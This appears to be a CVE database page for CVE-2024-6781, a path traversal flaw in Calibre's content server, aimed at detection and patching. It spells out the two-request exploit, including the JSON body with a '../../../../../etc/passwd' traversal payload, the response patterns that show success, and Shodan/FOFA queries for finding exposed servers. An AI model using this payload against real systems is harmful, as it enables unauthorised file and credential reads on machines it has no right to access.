cbcvebase.
CVE-2024-6781
published 2024-08-06

CVE-2024-6781: Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.

PriorityP277high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
62.70%
99.1th percentile
Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.

Affected

5 ranges
VendorProductVersion rangeFixed in
calibre-ebookcalibre<= 7.14.0
calibrecalibre
calibrecalibre>= 0 < 7.16.0+ds-17.16.0+ds-1
calibrecalibre>= 0 < 7.16.0+ds-17.16.0+ds-1
debiancalibre< calibre 7.16.0+ds-1 (forky)calibre 7.16.0+ds-1 (forky)

Detection & IOCsextracted from sources · hover to see the quote

urlGET /interface-data/books-init HTTP/1.1
urlPOST /cdb/cmd/export HTTP/1.1
command["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
path../../../../../etc/passwd
  • First stage: send GET to /interface-data/books-init to extract a valid book_id from '.search_result.book_ids[0]' via JSON extraction, then use it in the exploit POST.
  • Second stage: POST to /cdb/cmd/export with Content-Type: application/json and body ["extra_file", <book_id>, "../../../../../etc/passwd", ""] to trigger path traversal arbitrary file read.
  • Successful exploitation returns HTTP 200 with Content-Type: application/json and a body matching both 'root:.*:0:0:' and '"result":' patterns.
  • No authentication is required; the vulnerability is exploitable by unauthenticated attackers against Calibre's content server.
  • Identify exposed Calibre content servers via Shodan (html:"Calibre") or FOFA (Server: calibre) for attack surface enumeration.
  • ·The exploit requires a two-step HTTP interaction: first retrieve a valid book_id, then use it in the path traversal POST. A single-request detection will miss the dependency.
  • ·Affected versions are Calibre <= 7.14.0; fixed in 7.15.0+ (upstream) and 7.16.0+ds-1 (Debian). Ensure version checks in scanners target this range.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.